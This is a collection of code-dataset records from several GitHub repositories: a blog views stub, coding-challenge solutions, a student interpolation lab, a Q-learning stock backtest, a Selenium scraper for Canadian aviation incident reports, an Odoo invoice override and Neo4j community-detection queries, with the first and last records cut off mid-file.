title = kwargs.get(\"title\")\n body = kwargs.get(\"body\")\n\n data = {\n \"userid\": userId,\n \"title\": title,\n \"body\": body\n }\n print(data)\n posts.append(data)\n print(\"post created successfully\")\n\n\nclass postdetailsview():\n @login_required\n def get(self, *args, **kwargs):\n postId = kwargs.get(\"id\")\n qs = [p for p in posts if p.get(\"id\") == postId]\n return qs\n\n def put(self, id=None, *args, **kwargs):\n post = [p for p in posts if p.get(\"id\") == id][0]\n title = kwargs.get(\"title\")\n body = kwargs.get(\"body\")\n post[\"title\"] = title\n post[\"body\"] = body\n print(post)\n\n\nlo = SigninView()\nlo.post(username=\"django\", email=\"django@123\")\npst = PostCreateView()\npst.post(title=\"my post\", body=\"this is my post\")\n\ndetail = postdetailsview()\ndetail.put(id=10, title=\"my post\", body=\"tis is my new post\")\nmp = MyPostsView()\nprint(mp.get())\n\n\npl = PostListView()\ns = pl.get()\n# try:\n# allposts=pl.get()\n# except Exception as e:\n# print(e)\n","repo_name":"jitheshlaledk/python","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25009261458","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n#\n# Complete the 'taskOfPairing' function below.\n#\n# The function is expected to return a LONG_INTEGER.\n# The function accepts LONG_INTEGER_ARRAY freq as parameter.\n#\n\ndef taskOfPairing(freq):\n # Write your code here\n count = 0\n unused = False\n for i in freq:\n if i != 0:\n count += i // 2\n if i % 2 != 0:\n if unused:\n count += 1\n unused = False\n else:\n unused = True\n else:\n unused = False\n return count\n \nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n freq_count = int(input().strip())\n\n freq = []\n\n for _ in range(freq_count):\n freq_item = int(input().strip())\n freq.append(freq_item)\n\n result = taskOfPairing(freq)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"lighterland/hari-hari-python","sub_path":"hackerrank/certification/problem solving (intermediate)/task-of-pairing.py","file_name":"task-of-pairing.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1440291150","text":"# By submitting this assignment, I agree to the following:\n# \"Aggies do not lie, cheat, or steal, or tolerate those who do.\"\n# \"I have not given or received any unauthorized aid on this assignment.\"\n#\n# Name: Ezra Jeter\n# Section: 213\n# Team: YOUR TEAM NUMBER\n# Assignment: Lab 3a Activity 2\n# Date: 20 September 2021\n\n# variables for each input of time and position\n\n#function which takes in inputs for time and position and inserts them into the interpolation formula\ndef interpolate(t,t1,t2,x1,x2,y1,y2,z1,z2):\n x = x1 + (t-t1) * (x2 - x1) / (t2 - t1)\n y = y1 + (t-t1) * (y2 - y1) / (t2 - t1)\n z = z1 + (t-t1) * (z2 - z1) / (t2 - t1)\n print('At time {:.1f} seconds the object is at ({:.2f}, {:.2f}, {:.2f})'.format(t,x,y,z))\n#user inputs for time and position\ntime1 = float(input('Enter time 1: '))\nx_pos1 = float(input('Enter the x position of the object at time 1: '))\ny_pos1 = float(input('Enter the y position of the object at time 1: '))\nz_pos1 = float(input('Enter the z position of the object at time 1: '))\ntime2 = float(input('Enter time 2: '))\nx_pos2 = float(input('Enter the x position of the object at time 2: '))\ny_pos2 = float(input('Enter the y position of the object at time 2: '))\nz_pos2 = float(input('Enter the z position of the object at time 2: '))\nprint('')\n\n#values of interest between inputted time values \nincrement = (time2 - time1) / 4\n\ntime_of_interest = time1\ninterpolate(time_of_interest,time1,time2,x_pos1,x_pos2,y_pos1,y_pos2,z_pos1,z_pos2)\n\ntime_of_interest += increment\ninterpolate(time_of_interest,time1,time2,x_pos1,x_pos2,y_pos1,y_pos2,z_pos1,z_pos2)\n\ntime_of_interest += increment\ninterpolate(time_of_interest,time1,time2,x_pos1,x_pos2,y_pos1,y_pos2,z_pos1,z_pos2)\n\ntime_of_interest += increment\ninterpolate(time_of_interest,time1,time2,x_pos1,x_pos2,y_pos1,y_pos2,z_pos1,z_pos2)\n\ntime_of_interest += increment\ninterpolate(time_of_interest,time1,time2,x_pos1,x_pos2,y_pos1,y_pos2,z_pos1,z_pos2)","repo_name":"ohKodiak/PythonWork","sub_path":"Lab3a_Act2.py","file_name":"Lab3a_Act2.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6623014704","text":"import numpy as np\nimport pandas as pd\n\nfrom rlmodel import strategylearner as sl\nimport Indicators as ind\n\n\nimport yfinance as yf\nfrom pandas_datareader import data as pdr\n\nyf.pdr_override() # configure pandas datareader to query yahoo finance\n\n\ndef get_stock_data( # pylint: disable=dangerous-default-value\n start_date: pd.Timestamp,\n end_date: pd.Timestamp,\n ticker: str = \"AAPL\", # type: ignore\n) -> pd.DataFrame:\n \"\"\"Wrapper for querying data through pandas datareader\"\"\"\n\n data_close_df: pd.DataFrame = pdr.get_data_yahoo(\n ticker, start=start_date, end=end_date\n )[\n [\"Adj Close\", \"Volume\"]\n ] # type: ignore\n return data_close_df\n\n\ndef compute_portvals(\n symbol: str = \"JPM\",\n start_date: pd.Timestamp = pd.Timestamp(\"2010-01-01\"),\n end_date: pd.Timestamp = pd.Timestamp(\"2011-12-31\"),\n orders: pd.DataFrame = pd.DataFrame(),\n start_val: float = 100000.0,\n commission: float = 9.95,\n impact: float = 0.005,\n):\n prices: pd.DataFrame = get_stock_data(start_date, end_date, symbol)\n prices.dropna(inplace=True)\n # get all stock symbols\n\n prices[\"cash\"] = 1.0\n orders[\"multiplier\"] = orders[\"Order\"].apply(lambda x: 1.0 if x == \"BUY\" else -1.0)\n orders[\"Shares\"] = orders[\"Shares\"] * orders[\"multiplier\"]\n orders.drop([\"Order\", \"multiplier\"], axis=1, inplace=True)\n\n # !!! TRADES HAS TO BE A GROUP BY AND NOT PIVOT TABLE!!!\n b = (\n orders.groupby([orders.index.get_level_values(0), \"Symbol\"])[[\"Shares\"]]\n .sum()\n .reset_index()\n )\n b.columns = [\"Date\", \"Symbol\", \"Shares\"]\n b.set_index(\"Date\", inplace=True)\n trades = b.pivot_table(\n values=\"Shares\", index=[\"Date\"], columns=[\"Symbol\"], fill_value=0\n )\n\n # trades = orders.pivot_table(values='Shares', index=['Date'], columns=['Symbol'],fill_value=0)\n empty = pd.DataFrame(index=prices.index)\n trades = pd.merge(empty, trades, how=\"left\", left_index=True, right_index=True)\n trades.fillna(0, inplace=True)\n trades = trades[sorted(trades.columns)]\n\n x = orders.reset_index().values\n trades[\"cash\"] = 0.0\n\n for i in x:\n trades.at[i[0], \"cash\"] += -(\n i[1] * prices.at[i[0], symbol]\n + commission\n + abs(i[1] * prices.at[i[0], symbol] * impact)\n )\n\n holdings = trades.copy()\n holdings.iloc[0, -1] = start_val + trades.iloc[0, -1]\n holdings = holdings.cumsum()\n\n values = prices * holdings\n\n portval = pd.DataFrame(values.sum(axis=1))\n\n portval.columns = [\"manual\"]\n\n return portval, values, holdings, trades, prices\n\n\ndef benchmarking(symbol=\"JPM\", sd=\"2010-01-01\", ed=\"2011-12-31\", start_val=100000.0):\n prices = ind.getStock(symbol, sd, ed)\n prices.dropna(inplace=True)\n\n prices[\"bench\"] = 1000.0 * prices[symbol]\n prices[\"bench\"] = prices[\"bench\"] + (start_val - 1000.0 * prices[symbol][0])\n prices[\"Benchmark\"] = prices[\"bench\"] / prices[\"bench\"][0]\n benchmark_cr = round(\n ((prices[\"Benchmark\"][-1] / prices[\"Benchmark\"][0]) - 1) * 100.0, 3\n )\n\n prices[\"normal\"] = np.log(prices[\"bench\"] / prices[\"bench\"].shift(1))\n\n bench = prices[[\"Benchmark\"]]\n return bench, benchmark_cr\n\n\ndef qLearning(\n symbol=\"JPM\",\n train_sd: pd.Timestamp = pd.Timestamp(\"2008-01-01\"),\n train_ed: pd.Timestamp = pd.Timestamp(\"2009-12-13\"),\n test_sd: pd.Timestamp = pd.Timestamp(\"2010-01-01\"),\n test_ed: pd.Timestamp = pd.Timestamp(\"2011-12-31\"),\n impact: float = 0.0,\n commission: float = 0.0,\n epochs: int = 100,\n dyna: int = 20,\n sv: int = 100000,\n):\n learner = sl.StrategyLearner(verbose=False, impact=0.0, dyna=dyna, epochs=epochs)\n learner.addEvidence(\n symbol=symbol, sd=train_sd, ed=train_ed, sv=sv\n ) # training phase\n\n df_trades = learner.testPolicy(symbol=symbol, sd=test_sd, ed=test_ed, sv=sv)\n df_trades = df_trades[df_trades[\"shares\"] != 0]\n df_trades[\"Order\"] = np.where(df_trades[\"shares\"] > 0, \"BUY\", \"SELL\")\n df_trades[\"Symbol\"] = symbol\n df_trades.columns = [\"Shares\", \"Order\", \"Symbol\"]\n df_trades[\"Shares\"] = df_trades[\"Shares\"].abs()\n\n ql_out, values, holdings, trades, prices = compute_portvals(\n symbol, test_sd, test_ed, df_trades, sv, commission=commission, impact=impact\n )\n\n ql_out.columns = [\"Q Learning\"]\n\n benchmark, benchmark_cr = benchmarking(\n symbol=symbol, sd=test_sd, ed=test_ed, start_val=sv\n )\n\n benchmark.columns = [\"Benchmark\"]\n\n ql_out_cr = round(\n ((ql_out[\"Q Learning\"][-1] / ql_out[\"Q Learning\"][0]) - 1) * 100.0, 3\n )\n\n ql_out[\"Q Learning\"] = ql_out[\"Q Learning\"] / ql_out[\"Q Learning\"][0]\n\n print(\"*****************\")\n print(\"Out Sample\")\n print(\n \"Buy-and-Hold strategy return for out-sample data is: \"\n + str(benchmark_cr)\n + \"%\"\n )\n print(\"Q Learning strategy return for out-sample data is: \" + str(ql_out_cr) + \"%\")\n print(\"\\n\")\n\n return ql_out.join(benchmark) # ql_out, ql_out_cr, benchmark, benchmark_cr\n","repo_name":"crivera2013/invest-dash","sub_path":"rlmodel/calculations.py","file_name":"calculations.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38117400121","text":"import uuid\nimport os\nimport json\nfrom bs4 import BeautifulSoup\nfrom .utils import Utils\nfrom pathlib import Path\nimport re\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\n\nclass CADORSQueryScrapper:\n def __init__(self, config: dict):\n \"\"\"\n [\n Class to fetch page urls from the search page\n ]\n\n Args:\n config ([dict]): [Configuration path to provide configuration details]\n \"\"\"\n self.driver = None\n self.options = {}\n self.occurance_url = None\n self.items_per_page = -1\n self.current_page = int(config[\"url_scrape_start\"])\n self.current_item = 0\n self.occurances = -1\n self.current_batch = 1\n self.url_scrape_limit = int(config[\"url_scrape_limit\"])\n self.batch_size = int(config[\"batch_size\"])\n self.base_url = config[\"base_url\"] + config[\"query_page_extension\"]\n self.driver_path = config[\"driver_path\"]\n self.occurances_output_folder = config[\"occurances_output_folder\"]\n\n # checking if output folder exists else creating one\n Path(config[\"occurances_output_folder\"]).mkdir(parents=True, exist_ok=True)\n\n self.urls = []\n\n def _get_summary_results(self):\n \"\"\"\n [\n Function to get summary results after searching\n ]\n\n Returns:\n [tuple]: [\n (\n driver -> Driver of the particular web page\n driver.current_url -> Current url of the driver\n int(Utils.get_numbers(occurance_text)[-1]) -> Get number of occurances on the page\n int(ids_per_page_element.get_attribute(\"value\")) -> Get number of ids per page\n )\n ]\n \"\"\"\n options = Options()\n options.headless = False\n options.add_argument(\"--window-size=1920,1200\")\n\n driver = webdriver.Chrome(executable_path=self.driver_path, options=options)\n driver.get(self.base_url)\n\n # the logic of date ranges goes here\n\n search_btn = driver.find_element(By.ID, \"btn_SearchTop\")\n search_btn.click()\n\n wait = WebDriverWait(driver, 240)\n # print(\"Waiting to get Summary results....\")\n wait.until(\n lambda x: x.find_element(\n By.XPATH, \"//*[contains(text(), ': Summary Results')]\"\n )\n )\n\n occurance_element = driver.find_element(\n By.XPATH, \"//div[@class='col-md-6 mrgn-bttm-md form-inline']\"\n )\n occurance_text = occurance_element.text\n\n ids_per_page_element = driver.find_element(By.ID, \"hidRecordsPerPage\")\n\n input_top = driver.find_element(By.ID, \"txtTopPageNumber\")\n driver.execute_script(\"arguments[0].value=''\", input_top)\n input_top.send_keys(str(self.current_page))\n go_btn = driver.find_element(By.ID, \"btnGoToPage\")\n go_btn.click()\n # print(driver.current_url)\n\n return (\n driver,\n options,\n driver.current_url,\n int(Utils.get_numbers(occurance_text)[-1]),\n 15\n # int(ids_per_page_element.get_attribute(\"value\")),\n )\n\n def scrape_occurances(self):\n \"\"\"\n [\n Function to scrape page occurances on the page\n ]\n \"\"\"\n (\n self.driver,\n self.options,\n self.occurance_url,\n self.occurances,\n self.items_per_page,\n ) = self._get_summary_results()\n\n while self.current_page <= self.occurances:\n # the scraping of all the occurances hasn't completed yet.\n\n element = self.driver.find_element(\n By.ID,\n \"ContentPlaceHolder1_rpt_CADORS_hyp_CADORSNum_\"\n + str(self.current_item),\n )\n self.urls.append(element.get_attribute(\"href\"))\n\n self.current_item += 1\n # print(f\"URLS fetched: {self.urls[-1]}\")\n # print(self.current_item)\n\n if self.current_item == self.items_per_page:\n # End of page\n\n # writing it to files\n if self.current_batch == self.batch_size:\n # print(\"Printing the occurances\")\n self._write_occurances_files(self.urls)\n self.urls = []\n self.current_batch = 0\n\n print(\"CURRENT PAGE: \", self.current_page)\n if self.current_page == self.url_scrape_limit:\n if self.urls:\n self._write_occurances_files(self.urls)\n break\n\n next_button = self.driver.find_element(By.ID, \"btnNextTop\")\n # print(\"Clicking the next button\")\n next_button.click()\n\n wait = WebDriverWait(self.driver, 240)\n wait.until(\n lambda x: int(\n Utils.get_numbers(\n x.find_element(\n By.XPATH,\n \"//div[@class='col-md-6 mrgn-bttm-md form-inline']\",\n ).text\n )[0]\n )\n == self.current_page + 1\n )\n self.current_page += 1\n self.current_batch += 1\n self.current_item = 0\n\n def _write_occurances_files(self, occurances: list):\n \"\"\"\n Function to write all occurance urls to files\n\n Args:\n occurances (list): [List of all occurance urls for incidents]\n \"\"\"\n # print(\"Trying to print the occurances\")\n with open(\n os.path.join(self.occurances_output_folder, str(uuid.uuid4()) + \".json\"),\n \"w\",\n ) as f:\n json.dump(occurances, f)\n\n\nclass CADORSPageScrapper:\n def __init__(self, url: str, config: dict) -> None:\n \"\"\"\n [\n Class to scrape information of a particular page\n ]\n Args:\n url ([str]): [Url of the page to scrape information from]\n config ([dict]): [Configuration path to provide configuration details]\n \"\"\"\n options = Options()\n options.headless = True\n options.add_argument(\"--window-size=1920,1200\")\n\n driver = webdriver.Chrome(\n executable_path=config[\"driver_path\"], options=options\n )\n driver.get(url)\n\n self.driver = driver\n self.url = url\n self.items_parsed = 0\n self.page_data = {}\n\n def scrape_data(self):\n \"\"\"\n Function to scrape data from the page\n \"\"\"\n\n cadors_report_soup = BeautifulSoup(self.driver.page_source, \"html5lib\")\n primary_panel_body = cadors_report_soup.find(\n \"section\", attrs={\"class\": \"mrgn-bttm-sm panel panel-primary\"}\n )\n\n record_no = int(\n Utils.get_numbers(\n primary_panel_body.find(\n \"header\", attrs={\"class\": \"text-danger\"}\n ).getText()\n )[0]\n )\n self.page_data[\"record_no\"] = record_no\n\n # fetching the main panel body\n panel_body = primary_panel_body.find(\"div\", attrs={\"class\": \"panel-body\"})\n\n # fetching CADORS Number and Occurance Category\n cadors_row = panel_body.find(\"div\", attrs={\"class\": \"row\"})\n (\n cadors_number_txt,\n cadors_number_val,\n occurance_category_txt,\n occurance_category_val,\n ) = cadors_row.findAll(\"div\", attrs={\"class\": \"col-md-3 mrgn-bttm-sm\"})\n\n cadors_number_val = Utils.clean_text(cadors_number_val.text)\n occurance_category_val = Utils.clean_text(occurance_category_val.text)\n\n temp = panel_body.find(\"div\", attrs={\"class\": \"row\"})\n t = 0\n for ele in temp.findAll(\"div\", attrs={\"class\": \"col-md-3 mrgn-bttm-sm\"}):\n x = ele.text\n x = re.sub(\" +\", \" \", x)\n x = x.strip()\n t += 1\n if t == 2:\n cador_no = x\n if t==4:\n occat=[]\n for li in ele.find('ul'):\n ltxt = li.text\n ltxt = re.sub(\" +\", \" \", ltxt)\n ltxt = ltxt.strip()\n # print(ltxt,len(ltxt))\n if len(ltxt)!=0:\n occat.append(ltxt)\n \n self.page_data[\"CADORS Number\"] = cador_no\n self.page_data['Occurrence Category']= occat\n self.page_data['Occurrence Summary']=[]\n \n \n for ele in panel_body.findAll(\n \"section\", attrs={\"class\": \"mrgn-bttm-sm panel panel-primary\"}\n ):\n head = ele.find(\"div\", attrs={\"class\": \"well well-sm\"}).text\n res = re.sub(\" +\", \" \", head)\n res = res.strip()\n # print('\\n',res,len(res),'\\n')\n if res == \"Occurrence Information\":\n occurance_information_section_panel_body = ele.find(\n \"div\", attrs={\"class\": \"panel-body\"}\n )\n key, val = None, None\n cnt = 0\n\n for row in occurance_information_section_panel_body.findAll(\n \"div\", attrs={\"class\": \"row\"}\n ):\n\n items = row.findAll(\n \"div\", class_=[\"col-md-3 mrgn-bttm-md\", \"col-md-4 mrgn-bttm-md\"]\n )\n\n for item in items:\n if cnt % 2 == 0:\n key = Utils.clean_text(item.text)\n\n else:\n val = Utils.clean_text(item.text)\n\n self.page_data[key] = val\n cnt += 1\n occurance_event_info = occurance_information_section_panel_body.find(\n \"section\", attrs={\"class\": \"mrgn-bttm-sm panel panel-primary bullet_left_15px\"}\n )\n # print(occurance_event_info)\n occ_event=[]\n if occurance_event_info.find(\"ul\") is not None:\n for li in occurance_event_info.find(\"ul\"):\n ltxt = li.text\n ltxt = re.sub(\" +\", \" \", ltxt)\n ltxt = ltxt.strip()\n if len(ltxt)!=0:\n occ_event.append(ltxt)\n self.page_data['Occurrence Event Information'] = occ_event\n elif res == \"Occurrence Summary\":\n a = ele.findAll(\"div\", attrs={\"class\": \"col-md-3 mrgn-bttm-md\"})\n for i in a:\n x = i.text\n x = re.sub(\" +\", \" \", x)\n x = x.strip()\n if x != \"Date Entered:\" and x != \"Narrative:\":\n date = x\n break\n b = ele.find(\n \"div\", attrs={\"class\": \"col-md-8 mrgn-bttm-md width-670px\"}\n ).text\n b = re.sub(\" +\", \" \", b)\n summary = b.strip()\n # print('\\n','Date:\\n',date,'--',len(date),'\\n','Summary:\\n',summary,'--',len(summary),'\\n')\n # os_g.append({\"Date\": date, \"Summary\": summary})\n self.page_data[\"Occurrence Summary\"].append({\"Date\": date, \"Summary\": summary})\n elif res=='Aircraft Information':\n air_info_single={}\n aircraft_information_section_panel_body = ele.find(\n \"div\", attrs={\"class\": \"panel-body\"}\n ) \n key, val = None, None\n for row in aircraft_information_section_panel_body.findAll(\n \"div\", attrs={\"class\": \"row\"}\n ):\n items = row.findAll(\n \"div\", class_=[\"col-md-3 mrgn-bttm-md\", \"col-md-4 mrgn-bttm-md\"]\n ) \n cnt=0\n for item in items:\n if cnt % 2 == 0:\n key = Utils.clean_text(item.text)\n air_info_single[key]=[]\n cnt += 1\n \n for row in aircraft_information_section_panel_body.findAll(\n \"div\", attrs={\"class\": \"row\"}\n ):\n items = row.findAll(\n \"div\", class_=[\"col-md-3 mrgn-bttm-md\", \"col-md-4 mrgn-bttm-md\"]\n ) \n cnt=0\n for item in items:\n if cnt % 2 == 0:\n key = Utils.clean_text(item.text)\n elif cnt % 2 != 0:\n val = Utils.clean_text(item.text)\n # print(val)\n air_info_single[key].append(val)\n cnt += 1\n \n air_info_single['Aircraft Event Information']=[] \n aircraft_event_info = aircraft_information_section_panel_body.findAll(\n \"section\", attrs={\"class\": \"mrgn-bttm-sm panel panel-primary bullet_left_15px\"}\n ) \n for airevent in aircraft_event_info:\n # print(airevent)\n aircraft_event=[]\n if airevent.find(\"ul\") is not None:\n for li in airevent.find(\"ul\"):\n ltxt = li.text\n ltxt = re.sub(\" +\", \" \", ltxt)\n ltxt = ltxt.strip()\n if len(ltxt)!=0:\n aircraft_event.append(ltxt)\n air_info_single['Aircraft Event Information'].append(aircraft_event)\n \n self.page_data['Aircraft Information']=air_info_single\n return self.page_data\n","repo_name":"kaumil/cmpt_732","sub_path":"api/scraping/scrapers.py","file_name":"scrapers.py","file_ext":"py","file_size_in_byte":14304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5783581462","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\nfrom odoo.tools import float_compare\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n \n sponsor_id = fields.Many2one('res.partner')\n campo_vacio = fields.Boolean('Campo vacio', default=False) \n \n payulatam_order_id = fields.Char('ID de Orden de PayU')\n payulatam_transaction_id = fields.Char('ID de Transacción de PayU')\n payulatam_signature = fields.Char('Signature de la Transacción')\n payulatam_state = fields.Char('Estado Transacción de PayU')\n payulatam_datetime = fields.Datetime('Fecha y Hora de la Transacción')\n payulatam_credit_card_token = fields.Char('Token Para Tarjetas de Crédito')\n payulatam_credit_card_masked = fields.Char('Mascara del Número de Tarjeta')\n payulatam_credit_card_identification = fields.Char('Identificación')\n payulatam_credit_card_method = fields.Char('Metodo de Pago')\n payulatam_request_expired = fields.Boolean('Request Expired')\n state = fields.Selection(selection_add=[('finalized', 'Finalizado')], selection_remove=['payu_pending','payu_approved'])\n# main_product_id = fields.Many2one('product.product', string=\"Plan Elegido\", compute=\"_compute_main_product_id\", store=True)\n payment_method_type = fields.Selection([\n (\"Credit Card\", \"Tarjeta de Crédito\"), \n (\"Cash\", \"Efectivo\"), \n (\"PSE\", \"PSE\"),\n (\"Product Without Price\", \"Producto con Precio $0\"),\n ])\n \n \n def post(self):\n # `user_has_group` won't be bypassed by `sudo()` since it doesn't change the user anymore.\n if not self.env.su and not self.env.user.has_group('account.group_account_invoice'):\n raise AccessError(_(\"You don't have the access rights to post an invoice.\"))\n for move in self:\n if not move.sponsor_id.generates_accounting:\n to_write = {'state': 'finalized'}\n move.write(to_write)\n if move.name == '/':\n # Get the journal's sequence.\n sequence = move._get_sequence()\n if not sequence:\n raise UserError(_('Please define a sequence on your journal.'))\n\n # Consume a new number.\n to_write['name'] = sequence.with_context(ir_sequence_date=move.date).next_by_id()\n\n move.write(to_write)\n return True\n if move.state == 'posted':\n raise UserError(_('The entry %s (id %s) is already posted.') % (move.name, move.id))\n if not move.line_ids.filtered(lambda line: not line.display_type):\n raise UserError(_('You need to add a line before posting.'))\n if move.auto_post and move.date > fields.Date.today():\n date_msg = move.date.strftime(get_lang(self.env).date_format)\n raise UserError(_(\"This move is configured to be auto-posted on %s\" % date_msg))\n\n if not move.partner_id:\n if move.is_sale_document():\n raise UserError(_(\"The field 'Customer' is required, please complete it to validate the Customer Invoice.\"))\n elif move.is_purchase_document():\n raise UserError(_(\"The field 'Vendor' is required, please complete it to validate the Vendor Bill.\"))\n\n if move.is_invoice(include_receipts=True) and float_compare(move.amount_total, 0.0, precision_rounding=move.currency_id.rounding) < 0:\n raise UserError(_(\"You cannot validate an invoice with a negative total amount. You should create a credit note instead. Use the action menu to transform it into a credit note or refund.\"))\n\n # Handle case when the invoice_date is not set. In that case, the invoice_date is set at today and then,\n # lines are recomputed accordingly.\n # /!\\ 'check_move_validity' must be there since the dynamic lines will be recomputed outside the 'onchange'\n # environment.\n if not move.invoice_date and move.is_invoice(include_receipts=True):\n move.invoice_date = fields.Date.context_today(self)\n move.with_context(check_move_validity=False)._onchange_invoice_date()\n\n # When the accounting date is prior to the tax lock date, move it automatically to the next available date.\n # /!\\ 'check_move_validity' must be there since the dynamic lines will be recomputed outside the 'onchange'\n # environment.\n if (move.company_id.tax_lock_date and move.date <= move.company_id.tax_lock_date) and (move.line_ids.tax_ids or move.line_ids.tag_ids):\n move.date = move.company_id.tax_lock_date + timedelta(days=1)\n move.with_context(check_move_validity=False)._onchange_currency()\n\n # Create the analytic lines in batch is faster as it leads to less cache invalidation.\n self.mapped('line_ids').create_analytic_lines()\n for move in self.sorted(lambda m: (m.date, m.ref or '', m.id)):\n if move.auto_post and move.date > fields.Date.today():\n raise UserError(_(\"This move is configured to be auto-posted on {}\".format(move.date.strftime(get_lang(self.env).date_format))))\n\n move.message_subscribe([p.id for p in [move.partner_id] if p not in move.sudo().message_partner_ids])\n\n to_write = {'state': 'posted'}\n\n if move.name == '/':\n # Get the journal's sequence.\n sequence = move._get_sequence()\n if not sequence:\n raise UserError(_('Please define a sequence on your journal.'))\n\n # Consume a new number.\n to_write['name'] = sequence.with_context(ir_sequence_date=move.date).next_by_id()\n\n move.write(to_write)\n\n # Compute 'ref' for 'out_invoice'.\n if move.type == 'out_invoice' and not move.invoice_payment_ref:\n to_write = {\n 'invoice_payment_ref': move._get_invoice_computed_reference(),\n 'line_ids': []\n }\n for line in move.line_ids.filtered(lambda line: line.account_id.user_type_id.type in ('receivable', 'payable')):\n to_write['line_ids'].append((1, line.id, {'name': to_write['invoice_payment_ref']}))\n move.write(to_write)\n\n if move == move.company_id.account_opening_move_id and not move.company_id.account_bank_reconciliation_start:\n # For opening moves, we set the reconciliation date threshold\n # to the move's date if it wasn't already set (we don't want\n # to have to reconcile all the older payments -made before\n # installing Accounting- with bank statements)\n move.company_id.account_bank_reconciliation_start = move.date\n\n for move in self:\n if not move.partner_id: continue\n partners = (move.partner_id | move.partner_id.commercial_partner_id)\n if move.type.startswith('out_'):\n partners._increase_rank('customer_rank')\n elif move.type.startswith('in_'):\n partners._increase_rank('supplier_rank')\n else:\n continue\n\n # Trigger action for paid invoices in amount is zero\n self.filtered(\n lambda m: m.is_invoice(include_receipts=True) and m.currency_id.is_zero(m.amount_total)\n ).action_invoice_paid()\n\n # Force balance check since nothing prevents another module to create an incorrect entry.\n # This is performed at the very end to avoid flushing fields before the whole processing.\n self._check_balanced()\n return True\n \n \n ","repo_name":"lq-todoo/Masmedicos","sub_path":"web_sale_extended/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74876079127","text":"import os\nimport pandas as pd\nfrom py2neo import Graph\nimport ujson\nfrom collections import defaultdict \n\ndef write_results(alg_name, direction, q2):\n results = {}\n\n for item in q2.data():\n results[item['node']['id']] = item['label']\n\n print('1st dict')\n\n mydict = defaultdict(list)\n for k,v in sorted(results.items()):\n mydict[v].append(k)\n\n print('2nd dict')\n\n with open(alg_name + '_' + direction + '_neo4j.txt', 'a') as f:\n f.write(ujson.dumps(mydict))\n\ngraph = Graph('127.0.0.1',password='gomugomuno13')\ntx = graph.begin()\n\nq1 = graph.run('''\n CALL algo.louvain.stream('User', 'TRADES', {\n direction: 'BOTH'\n })YIELD nodeId, community\n RETURN algo.getNodeById(nodeId) as node, community\n ''')\n\nq2 = graph.run('''\n CALL algo.labelPropagation.stream(\"User\", \"TRADES\",\n {direction: \"BOTH\", iterations: 10})\n YIELD nodeId, label\n RETURN algo.getNodeById(nodeId) as node, label\n ''')\n\nprint('query done')\n\nwrite_results('louvain' , 'BOTH', q1)\nwrite_results('label_propagation', 'BOTH', q2)","repo_name":"LeoVogiatzis/GraphAnalysis","sub_path":"community_detection/com_dec_neo.py","file_name":"com_dec_neo.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8519469994","text":"\npositions_to_fuel = {}\n\nif __name__ == '__main__':\n with open('./sample.txt') as f:\n positions = [int(position) for position in f.readline().split(',')]\n maximum = len(positions) - 1\n\n for index, position in enumerate(positions):\n if position not in positions_to_fuel:\n next = min(index + 1, maximum)\n left = positions[:index]\n right = positions[next:]\n \n positions_to_fuel[position] = sum(abs(position - pos) for pos in left) + sum(abs(position - pos) for pos in right)\n \n least_fuel = min(positions_to_fuel.values())\n print(f\"The least amount of fuel used was - {least_fuel}\")","repo_name":"jacob-carrier/advent-of-code-2021","sub_path":"day_7/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25241639802","text":"import sys\n\nn, m = map(int, sys.stdin.readline().strip().split())\narr = list(map(int, sys.stdin.readline().strip().split()))\n\nstart = 1\nend = max(arr)\n\nwhile start <= end:\n mid = (start + end) // 2\n num = 0\n\n for i in arr:\n if mid <= i:\n num += i - mid\n\n if num >= m:\n start = mid + 1\n else:\n end = mid - 1\n\nprint(end)\n","repo_name":"juntae6942/ANA-Daily-Algorithm","sub_path":"차영은/BOJ_2805.py","file_name":"BOJ_2805.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"10698192454","text":"import random\r\ndef Game(Computer, You):\r\n if Computer==You:\r\n return None\r\n elif Computer=='s':\r\n if You=='p':\r\n return True\r\n if You=='sc':\r\n return False\r\n elif Computer=='p':\r\n if You=='s':\r\n return False\r\n if You=='sc':\r\n return True\r\n elif Computer=='sc':\r\n if You=='s':\r\n return True\r\n if You=='p':\r\n return False\r\nprint('Computer turn Stone(s), Paper(p), Scissor(sc)')\r\nrandno=random.randint(1,3)\r\nif randno==1:\r\n Computer='s'\r\nelif randno==2:\r\n Computer='p'\r\nelif randno==3:\r\n Computer='sc'\r\nYou=input('Your turn Stone(s), Paper(p), Scissor(sc)\\n')\r\na=Game(Computer,You)\r\nprint(f'computer chose {Computer}')\r\nprint(f'you chose {You}')\r\nif 